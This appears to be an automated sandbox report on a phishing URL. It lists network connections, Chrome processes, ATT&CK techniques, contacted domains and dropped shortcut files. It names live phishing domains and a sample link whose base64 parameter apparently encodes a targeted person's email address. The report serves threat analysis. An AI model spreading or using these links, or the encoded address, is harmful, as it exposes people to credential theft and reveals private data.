Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: classification engineClassification label: mal68.phis.win@22/31@40/239
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1960,i,4594266304876997012,8000602555757688366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1960,i,4594266304876997012,8000602555757688366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://logos-world.net/wp-content/uploads/2020/07/Adobe-Logo-700x394.png0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/91b2a5278a73180d/1741104643153/f8f4e391523fe51cac0ddcd873ac74e5a4611624f4523411859594bd95158235/T4Yp7ZcDEH_-vmD0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/91b2a5278a73180d/1741104643151/Mii058oQqjPbOGW0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1194248761:1741101415:ebAz2A4--oCO2_y5RRsSgSZ_3LX5C-f-SQuFHdUY3Ts/91b2a5278a73180d/MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayG0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5278a73180d&lang=auto0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/fd9d1056-6c5a8f8591424bc5.js0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/app/not-found-00e5a2a077bf796c.js0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/attach,loading.htm0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/media/a34f9d1faa5f3315.p.woff20%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/webpack-20efd41c90b5bcbd.js0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/favicon.ico0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/css/f796ea3b426fcf90.css0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/92-1f56c09006754f8e.js0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/microsoft.jpg0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/api/config/0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/api/config0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/23-5e92960ee97bfa6f.js0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/css/7b64cd318fb77179.css0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/app/page-c97a01c11dd2213c.js0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/_next/static/chunks/main-app-6e9565c54018939e.js0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5edeb89c5e7&lang=auto0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/api/check-bot/0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nwgwm/0x4AAAAAAA-u8M1sVllAhCoK/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/api/check-ip0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/api/check-bot0%Avira URL Cloudsafe
https://imagedelivery.net/V5lSkRYhzcE91zkPxxAW4g/550dcf19-a5a9-4ea6-1c7a-34bb54683400/public0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/outlook.png0%Avira URL Cloudsafe
https://coxuongkhopbariavungtau.com/api/check-ip/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
coxuongkhopbariavungtau.com
37.221.114.33
truefalse
    high
    1004834818.rsc.cdn77.org
    207.211.211.27
    truefalse
      high
      imagedelivery.net
      104.18.2.36
      truefalse
        high
        logos-world.net
        104.26.3.6
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              security-us.m.mimecastprotect.com
              170.10.132.87
              truefalse
                high
                www.google.com
                142.250.185.132
                truefalse
                  high
                  hiiudvt8z.awbpartners.com.au
                  192.185.198.1
                  truetrue
                    unknown
                    secureonlineauthenticate.awbpartners.com.au
                    192.185.198.1
                    truetrue
                      unknown
                      img.icons8.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://coxuongkhopbariavungtau.com/_next/static/chunks/fd9d1056-6c5a8f8591424bc5.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://coxuongkhopbariavungtau.com/_next/static/css/f796ea3b426fcf90.cssfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://imagedelivery.net/V5lSkRYhzcE91zkPxxAW4g/550dcf19-a5a9-4ea6-1c7a-34bb54683400/publicfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://coxuongkhopbariavungtau.com/api/check-ipfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5edeb89c5e7&lang=autofalse
                        • Avira URL Cloud: safe
                        unknown
                        https://coxuongkhopbariavungtau.com/outlook.pngfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                          high
                          https://coxuongkhopbariavungtau.com/_next/static/media/a34f9d1faa5f3315.p.woff2false
                          • Avira URL Cloud: safe
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hquoi/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/false
                          • Avira URL Cloud: safe
                          unknown
                          https://coxuongkhopbariavungtau.com/_next/static/chunks/webpack-20efd41c90b5bcbd.jstrue
                          • Avira URL Cloud: safe
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1194248761:1741101415:ebAz2A4--oCO2_y5RRsSgSZ_3LX5C-f-SQuFHdUY3Ts/91b2a5278a73180d/MqrbWiH.p_CbOALfUC5fkwv9p0dZIVKvOtCGQcp9Pxc-1741104641-1.1.1.1-HWEgMJViHtBSJ3fKx2t4zEuOTwm2.HpAiJJ7gCLiNhkmaoiEpmXRcOFNF4J_XayGfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://coxuongkhopbariavungtau.com/api/check-botfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://coxuongkhopbariavungtau.com/?S=herp%40derp.comfalse
                            unknown
                            https://coxuongkhopbariavungtau.com/_next/static/chunks/app/not-found-00e5a2a077bf796c.jstrue
                            • Avira URL Cloud: safe
                            unknown
                            https://coxuongkhopbariavungtau.com/attach,loading.htmfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/91b2a5278a73180d/1741104643153/f8f4e391523fe51cac0ddcd873ac74e5a4611624f4523411859594bd95158235/T4Yp7ZcDEH_-vmDfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://coxuongkhopbariavungtau.com/microsoft.jpgfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://coxuongkhopbariavungtau.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://coxuongkhopbariavungtau.com/_next/static/chunks/92-1f56c09006754f8e.jsfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://coxuongkhopbariavungtau.com/api/config/false
                            • Avira URL Cloud: safe
                            unknown
                            https://coxuongkhopbariavungtau.com/api/configfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nwgwm/0x4AAAAAAA-u8M1sVllAhCoK/auto/fbE/new/normal/auto/false
                                • Avira URL Cloud: safe
                                unknown
                                https://coxuongkhopbariavungtau.com/api/check-bot/false
                                • Avira URL Cloud: safe
                                unknown
                                https://logos-world.net/wp-content/uploads/2020/07/Adobe-Logo-700x394.pngfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://img.icons8.com/ios-filled/50/microsoft-admin.pngfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91b2a5278a73180d&lang=autofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://coxuongkhopbariavungtau.com/_next/static/chunks/23-5e92960ee97bfa6f.jsfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://coxuongkhopbariavungtau.com/_next/static/css/7b64cd318fb77179.cssfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://coxuongkhopbariavungtau.com/_next/static/chunks/main-app-6e9565c54018939e.jstrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://coxuongkhopbariavungtau.com/api/check-ip/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/91b2a5278a73180d/1741104643151/Mii058oQqjPbOGWfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                    high
                                    https://security-us.m.mimecastprotect.com/ttpwp/resources/images/favicon.icofalse
                                      high
                                      https://coxuongkhopbariavungtau.com/_next/static/chunks/app/page-c97a01c11dd2213c.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.186.35
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      216.58.212.131
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.18.2.36
                                      imagedelivery.netUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.18.94.41
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      195.181.170.18
                                      unknownUnited Kingdom
                                      60068CDN77GBfalse
                                      74.125.71.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.26.3.6
                                      logos-world.netUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.185.132
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      104.18.95.41
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      170.10.132.87
                                      security-us.m.mimecastprotect.comUnited States
                                      30031MIMECAST-USfalse
                                      170.10.132.88
                                      unknownUnited States
                                      30031MIMECAST-USfalse
                                      37.221.114.33
                                      coxuongkhopbariavungtau.comRomania
                                      9009M247GBfalse
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      142.250.185.142
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      207.211.211.27
                                      1004834818.rsc.cdn77.orgUnited States
                                      14135NAVISITE-EAST-2USfalse
                                      142.250.184.238
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.186.74
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.17.25.14
                                      cdnjs.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      192.185.198.1
                                      hiiudvt8z.awbpartners.com.auUnited States
                                      46606UNIFIEDLAYER-AS-1UStrue
                                      IP
                                      192.168.2.18
                                      192.168.2.6
                                      127.0.0.1
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1629381
                                      Start date and time:2025-03-04 17:09:57 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Sample URL:https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:16
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal68.phis.win@22/31@40/239
                                      • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.60.203.209, 216.58.212.131, 142.250.184.238, 74.125.71.84, 142.250.186.174, 216.58.212.142, 142.250.185.142
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, e16604.f.akamaiedge.net, clientservices.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 4 15:10:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2675
                                      Entropy (8bit):3.9830537379207738
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8DE2B19C4860A3743ECE095949630D71
                                      SHA1:522A30AA700F87B41EB3B69509DD69174BC47511
                                      SHA-256:9A8D961621BB2C6B4C7F669C35FC73116128AB63C2C876E014E2064FDAD7E79D
                                      SHA-512:96DCBB9A0BE12074A15AA7D32DBFDF3840509AEA6472B3685447F2E33ED7391A66317C5A61D457F996DCC2C4BFD801B891C96C6C02572539200D74A9A6B07131
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....{...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IdZI.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdZQ.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VdZQ.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VdZQ............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VdZS......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y.TY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 4 15:10:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2677
                                      Entropy (8bit):3.9943994736182424
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0564AB6757F0E7475786C30F56C2D7DC
                                      SHA1:16ECCE4F68CDBBB8E9218EBC3AF46F85B00AC004
                                      SHA-256:D841913A446DFB6507DB9F96DB7D0C9B64DC7F90BDD3CD19F292FDE2443F9F0E
                                      SHA-512:2AAA3E0778DA02821CE94DFBA37C22647DE117C5D107A7D49D269378DB2E7CF996076749E734A61CD4DD43F79033563D8FF7605C7C0EAFAF3028CF413CD3AF34
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IdZI.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdZQ.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VdZQ.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VdZQ............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VdZS......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y.TY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2691
                                      Entropy (8bit):4.006395322390846
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9527582F8A778AE62101965340BD74DF
                                      SHA1:60DA00B8852671E4C8C71F94BB4E9CAF75CE98E9
                                      SHA-256:8FCF3E5E7827F337CADD5FA76BD7C6D9CC56135C8D84F943AA58C5EE41AF1767
                                      SHA-512:84DD9331A833AC1DB4963FDFD12EC4D3B481B9FAD2E58978F61054C5D28003970E2F1AA648F36402BB16763E8185619B1DE693E4623F6171C19A42435DCE626B
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IdZI.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VdZQ.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VdZQ.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VdZQ............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y.TY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 4 15:10:36 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2679
                                      Entropy (8bit):3.9943539656077833
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:E1C596D92D8825A2BED67D54B0E385E6
                                      SHA1:BFB367616FF1E4CFA149F9CDB40E0F0D5B09CAB4
                                      SHA-256:1285F6E8585EBB1DFCFA73919875762CF2EABDDD037D76956DE76E8CE15093F6
                                      SHA-512:113619BB954D8AC1F1E109F0584F480D9D238713674CADFD6B87B3A3570792E6B0FF7D175B9F578E65F687DF63C207DFD8F4E234E8880BA21BAF22A2ECB3D279
                                      Malicious:false
                                      Reputation:unknown
